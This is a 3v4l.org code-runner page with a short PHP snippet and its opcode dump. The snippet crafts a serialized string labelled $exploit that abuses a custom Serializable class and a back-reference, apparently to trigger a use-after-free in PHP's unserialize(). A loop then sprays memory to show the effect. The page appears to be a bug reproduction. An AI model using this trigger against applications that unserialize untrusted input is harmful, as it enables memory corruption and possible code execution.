3v4l.org

run code in 300+ PHP versions simultaneously
<?php class obj implements Serializable { private $data; public function serialize() { return serialize($this->data); } public function unserialize($data) { $this->data = unserialize($data); $this->data = 3; } } $inner = 'a:0:{}'; $exploit = 'a:2:{i:0;C:3:"obj":' . strlen($inner) . ':{' . $inner . '}i:1;R:3;}'; $data = unserialize($exploit); for ($i = 0; $i < 5; $i++) { $v[$i] = 'hi' . $i; } var_dump($data);
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 14
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 14
Branch analysis from position: 20
Branch analysis from position: 14
filename:       /in/BclOC
function name:  (null)
number of ops:  24
compiled vars:  !0 = $inner, !1 = $exploit, !2 = $data, !3 = $i, !4 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    2     0  E >   DECLARE_CLASS                                            'obj'
   18     1        ASSIGN                                                   !0, 'a%3A0%3A%7B%7D'
   19     2        STRLEN                                           ~6      !0
          3        CONCAT                                           ~7      'a%3A2%3A%7Bi%3A0%3BC%3A3%3A%22obj%22%3A', ~6
          4        CONCAT                                           ~8      ~7, '%3A%7B'
          5        CONCAT                                           ~9      ~8, !0
          6        CONCAT                                           ~10     ~9, '%7Di%3A1%3BR%3A3%3B%7D'
          7        ASSIGN                                                   !1, ~10
   21     8        INIT_FCALL                                               'unserialize'
          9        SEND_VAR                                                 !1
         10        DO_ICALL                                         $12     
         11        ASSIGN                                                   !2, $12
   23    12        ASSIGN                                                   !3, 0
         13      > JMP                                                      ->18
   24    14    >   CONCAT                                           ~16     'hi', !3
         15        ASSIGN_DIM                                               !4, !3
         16        OP_DATA                                                  ~16
   23    17        PRE_INC                                                  !3
         18    >   IS_SMALLER                                               !3, 5
         19      > JMPNZ                                                    ~18, ->14
   27    20    >   INIT_FCALL                                               'var_dump'
         21        SEND_VAR                                                 !2
         22        DO_ICALL                                                 
         23      > RETURN                                                   1

Class obj:
Function serialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BclOC
function name:  serialize
number of ops:  6
compiled vars:  none
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    8     0  E >   INIT_FCALL                                               'serialize'
          1        FETCH_OBJ_R                                      ~0      'data'
          2        SEND_VAL                                                 ~0
          3        DO_ICALL                                         $1      
          4      > RETURN                                                   $1
    9     5*     > RETURN                                                   null

End of function serialize

Function unserialize:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/BclOC
function name:  unserialize
number of ops:  9
compiled vars:  !0 = $data
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   11     0  E >   RECV                                             !0      
   13     1        INIT_FCALL                                               'unserialize'
          2        SEND_VAR                                                 !0
          3        DO_ICALL                                         $2      
          4        ASSIGN_OBJ                                               'data'
          5        OP_DATA                                                  $2
   14     6        ASSIGN_OBJ                                               'data'
          7        OP_DATA                                                  3
   15     8      > RETURN                                                   null

End of function unserialize

End of class obj.

Generated using Vulcan Logic Dumper, using php 8.0.0

preferences:
149.64 ms | 1400 KiB | 19 Q